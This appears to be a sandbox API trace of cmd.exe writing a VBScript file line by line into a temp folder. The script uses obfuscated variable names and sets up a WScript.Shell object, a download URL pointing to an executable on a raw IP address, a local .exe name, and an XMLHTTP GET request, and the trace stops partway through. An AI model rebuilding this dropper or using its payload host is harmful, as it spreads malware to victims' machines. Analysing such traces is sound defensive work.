[0077.819] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22faa8 | out: lpMode=0x22faa8) returned 1
[0077.820] _dup (_FileHandle=1) returned 3
[0077.820] _close (_FileHandle=1) returned 0
[0077.820] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.820] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x22fa78, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.821] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.821] GetConsoleTitleW (in: lpConsoleTitle=0x22f8a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.821] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0077.821] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0077.821] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0077.821] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0077.821] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0077.821] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0077.821] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0077.821] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0077.821] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0077.821] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0077.824] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22f870 | out: _Buffer="set H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c = createobject(\"wscript.shell\") \r\n") returned 73
[0077.832] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.832] GetFileType (hFile=0x1c) returned 0x1
[0077.832] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.832] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="set H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c = createobject(\"wscript.shell\") \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="set H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c = createobject(\"wscript.shell\") \r\n", lpUsedDefaultChar=0x0) returned 74
[0077.832] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x22f85c, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22f85c*=0x49, lpOverlapped=0x0) returned 1
[0077.833] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.837] _close (_FileHandle=3) returned 0
[0077.837] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.837] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.837] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.837] GetFileType (hFile=0x7) returned 0x2
[0077.837] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.837] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f9e4 | out: lpMode=0x22f9e4) returned 1
[0077.837] _dup (_FileHandle=1) returned 3
[0077.838] _close (_FileHandle=1) returned 0
[0077.838] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.838] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22f9b4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.838] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.838] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.838] GetFileType (hFile=0x1c) returned 0x1
[0077.838] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x49
[0077.838] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22f9cc*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22f9cc*=0) returned 0x48
[0077.838] ReadFile (in: hFile=0x1c, lpBuffer=0x22f9c4, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22f9c0, lpOverlapped=0x0 | out: lpBuffer=0x22f9c4*, lpNumberOfBytesRead=0x22f9c0*=0x1, lpOverlapped=0x0) returned 1
[0077.838] GetConsoleTitleW (in: lpConsoleTitle=0x22f7e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.839] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22f7ac | out: _Buffer="Dim X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x \r\n") returned 53
[0077.839] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.839] GetFileType (hFile=0x1c) returned 0x1
[0077.839] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.839] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Dim X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dim X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x \r\n", lpUsedDefaultChar=0x0) returned 54
[0077.839] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x35, lpNumberOfBytesWritten=0x22f798, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22f798*=0x35, lpOverlapped=0x0) returned 1
[0077.839] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.840] _close (_FileHandle=3) returned 0
[0077.840] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.840] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.840] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.840] GetFileType (hFile=0x7) returned 0x2
[0077.841] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.841] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f920 | out: lpMode=0x22f920) returned 1
[0077.841] _dup (_FileHandle=1) returned 3
[0077.841] _close (_FileHandle=1) returned 0
[0077.841] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.841] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22f8f0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.841] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.841] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.841] GetFileType (hFile=0x1c) returned 0x1
[0077.841] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7e
[0077.842] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22f908*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22f908*=0) returned 0x7d
[0077.842] ReadFile (in: hFile=0x1c, lpBuffer=0x22f900, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22f8fc, lpOverlapped=0x0 | out: lpBuffer=0x22f900*, lpNumberOfBytesRead=0x22f8fc*=0x1, lpOverlapped=0x0) returned 1
[0077.842] GetConsoleTitleW (in: lpConsoleTitle=0x22f720, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.842] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22f6e8 | out: _Buffer="Dim R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w \r\n") returned 44
[0077.842] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.842] GetFileType (hFile=0x1c) returned 0x1
[0077.842] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.842] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Dim R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dim R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w \r\n", lpUsedDefaultChar=0x0) returned 45
[0077.842] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x22f6d4, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22f6d4*=0x2c, lpOverlapped=0x0) returned 1
[0077.842] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.843] _close (_FileHandle=3) returned 0
[0077.844] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.844] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.844] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.844] GetFileType (hFile=0x7) returned 0x2
[0077.844] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.844] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f85c | out: lpMode=0x22f85c) returned 1
[0077.844] _dup (_FileHandle=1) returned 3
[0077.844] _close (_FileHandle=1) returned 0
[0077.845] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.845] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22f82c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.845] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.845] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.845] GetFileType (hFile=0x1c) returned 0x1
[0077.845] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xaa
[0077.845] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22f844*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22f844*=0) returned 0xa9
[0077.845] ReadFile (in: hFile=0x1c, lpBuffer=0x22f83c, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22f838, lpOverlapped=0x0 | out: lpBuffer=0x22f83c*, lpNumberOfBytesRead=0x22f838*=0x1, lpOverlapped=0x0) returned 1
[0077.845] GetConsoleTitleW (in: lpConsoleTitle=0x22f65c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.846] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22f624 | out: _Buffer="Dim B8yU2nW4oD3lW4vO1xP2nY9oR3e \r\n") returned 35
[0077.846] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.846] GetFileType (hFile=0x1c) returned 0x1
[0077.846] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.846] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Dim B8yU2nW4oD3lW4vO1xP2nY9oR3e \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dim B8yU2nW4oD3lW4vO1xP2nY9oR3e \r\n", lpUsedDefaultChar=0x0) returned 36
[0077.846] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x23, lpNumberOfBytesWritten=0x22f610, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22f610*=0x23, lpOverlapped=0x0) returned 1
[0077.846] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.849] _close (_FileHandle=3) returned 0
[0077.850] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.850] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.850] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.850] GetFileType (hFile=0x7) returned 0x2
[0077.850] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.850] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f798 | out: lpMode=0x22f798) returned 1
[0077.850] _dup (_FileHandle=1) returned 3
[0077.850] _close (_FileHandle=1) returned 0
[0077.851] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.851] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22f768, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.851] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.851] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.851] GetFileType (hFile=0x1c) returned 0x1
[0077.851] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcd
[0077.851] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22f780*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22f780*=0) returned 0xcc
[0077.851] ReadFile (in: hFile=0x1c, lpBuffer=0x22f778, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22f774, lpOverlapped=0x0 | out: lpBuffer=0x22f778*, lpNumberOfBytesRead=0x22f774*=0x1, lpOverlapped=0x0) returned 1
[0077.851] GetConsoleTitleW (in: lpConsoleTitle=0x22f598, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.851] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22f560 | out: _Buffer="Dim N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i \r\n") returned 68
[0077.851] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.851] GetFileType (hFile=0x1c) returned 0x1
[0077.851] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.851] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Dim N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dim N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i \r\n", lpUsedDefaultChar=0x0) returned 69
[0077.851] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x22f54c, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22f54c*=0x44, lpOverlapped=0x0) returned 1
[0077.852] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.852] _close (_FileHandle=3) returned 0
[0077.853] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.853] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.853] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.853] GetFileType (hFile=0x7) returned 0x2
[0077.853] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.853] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f6d4 | out: lpMode=0x22f6d4) returned 1
[0077.853] _dup (_FileHandle=1) returned 3
[0077.853] _close (_FileHandle=1) returned 0
[0077.853] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.854] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22f6a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.854] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.854] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.854] GetFileType (hFile=0x1c) returned 0x1
[0077.854] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x111
[0077.854] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22f6bc*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22f6bc*=0) returned 0x110
[0077.854] ReadFile (in: hFile=0x1c, lpBuffer=0x22f6b4, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22f6b0, lpOverlapped=0x0 | out: lpBuffer=0x22f6b4*, lpNumberOfBytesRead=0x22f6b0*=0x1, lpOverlapped=0x0) returned 1
[0077.854] GetConsoleTitleW (in: lpConsoleTitle=0x22f4d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.854] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22f49c | out: _Buffer="X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x = \"http://82.118.242.107/~able/1_ga/al/al.exe\" \r\n") returned 96
[0077.854] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.854] GetFileType (hFile=0x1c) returned 0x1
[0077.854] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.854] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x = \"http://82.118.242.107/~able/1_ga/al/al.exe\" \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x = \"http://82.118.242.107/~able/1_ga/al/al.exe\" \r\n", lpUsedDefaultChar=0x0) returned 97
[0077.854] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x22f488, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22f488*=0x60, lpOverlapped=0x0) returned 1
[0077.854] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.857] _close (_FileHandle=3) returned 0
[0077.857] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.857] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.857] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.857] GetFileType (hFile=0x7) returned 0x2
[0077.858] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.858] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f610 | out: lpMode=0x22f610) returned 1
[0077.858] _dup (_FileHandle=1) returned 3
[0077.858] _close (_FileHandle=1) returned 0
[0077.858] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.858] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22f5e0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.858] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.858] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.858] GetFileType (hFile=0x1c) returned 0x1
[0077.858] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x171
[0077.858] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22f5f8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22f5f8*=0) returned 0x170
[0077.859] ReadFile (in: hFile=0x1c, lpBuffer=0x22f5f0, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22f5ec, lpOverlapped=0x0 | out: lpBuffer=0x22f5f0*, lpNumberOfBytesRead=0x22f5ec*=0x1, lpOverlapped=0x0) returned 1
[0077.859] GetConsoleTitleW (in: lpConsoleTitle=0x22f410, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.859] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22f3d8 | out: _Buffer="R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w = \"JSTCHV.eXe\" \r\n") returned 55
[0077.859] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.859] GetFileType (hFile=0x1c) returned 0x1
[0077.859] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.859] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w = \"JSTCHV.eXe\" \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w = \"JSTCHV.eXe\" \r\n", lpUsedDefaultChar=0x0) returned 56
[0077.859] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x22f3c4, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22f3c4*=0x37, lpOverlapped=0x0) returned 1
[0077.859] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.861] _close (_FileHandle=3) returned 0
[0077.862] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.862] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.862] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.862] GetFileType (hFile=0x7) returned 0x2
[0077.862] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.862] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f54c | out: lpMode=0x22f54c) returned 1
[0077.863] _dup (_FileHandle=1) returned 3
[0077.863] _close (_FileHandle=1) returned 0
[0077.863] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.863] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22f51c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.864] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.864] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.864] GetFileType (hFile=0x1c) returned 0x1
[0077.864] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1a8
[0077.864] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22f534*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22f534*=0) returned 0x1a7
[0077.864] ReadFile (in: hFile=0x1c, lpBuffer=0x22f52c, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22f528, lpOverlapped=0x0 | out: lpBuffer=0x22f52c*, lpNumberOfBytesRead=0x22f528*=0x1, lpOverlapped=0x0) returned 1
[0077.864] GetConsoleTitleW (in: lpConsoleTitle=0x22f34c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.864] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22f314 | out: _Buffer="Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = CreateObject(\"MSXML2.XMLHTTP\") \r\n") returned 68
[0077.864] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.864] GetFileType (hFile=0x1c) returned 0x1
[0077.865] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.865] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = CreateObject(\"MSXML2.XMLHTTP\") \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = CreateObject(\"MSXML2.XMLHTTP\") \r\n", lpUsedDefaultChar=0x0) returned 69
[0077.865] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x22f300, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22f300*=0x44, lpOverlapped=0x0) returned 1
[0077.865] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.866] _close (_FileHandle=3) returned 0
[0077.866] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.866] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.866] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.866] GetFileType (hFile=0x7) returned 0x2
[0077.866] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.866] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f488 | out: lpMode=0x22f488) returned 1
[0077.867] _dup (_FileHandle=1) returned 3
[0077.867] _close (_FileHandle=1) returned 0
[0077.867] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.867] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22f458, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.867] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.868] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.868] GetFileType (hFile=0x1c) returned 0x1
[0077.868] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1ec
[0077.868] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22f470*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22f470*=0) returned 0x1eb
[0077.868] ReadFile (in: hFile=0x1c, lpBuffer=0x22f468, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22f464, lpOverlapped=0x0 | out: lpBuffer=0x22f468*, lpNumberOfBytesRead=0x22f464*=0x1, lpOverlapped=0x0) returned 1
[0077.868] GetConsoleTitleW (in: lpConsoleTitle=0x22f288, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.868] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22f250 | out: _Buffer="B8yU2nW4oD3lW4vO1xP2nY9oR3e.Open \"GET\", X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x, False \r\n") returned 96
[0077.868] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.868] GetFileType (hFile=0x1c) returned 0x1
[0077.868] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.868] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="B8yU2nW4oD3lW4vO1xP2nY9oR3e.Open \"GET\", X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x, False \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="B8yU2nW4oD3lW4vO1xP2nY9oR3e.Open \"GET\", X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x, False \r\n", lpUsedDefaultChar=0x0) returned 97
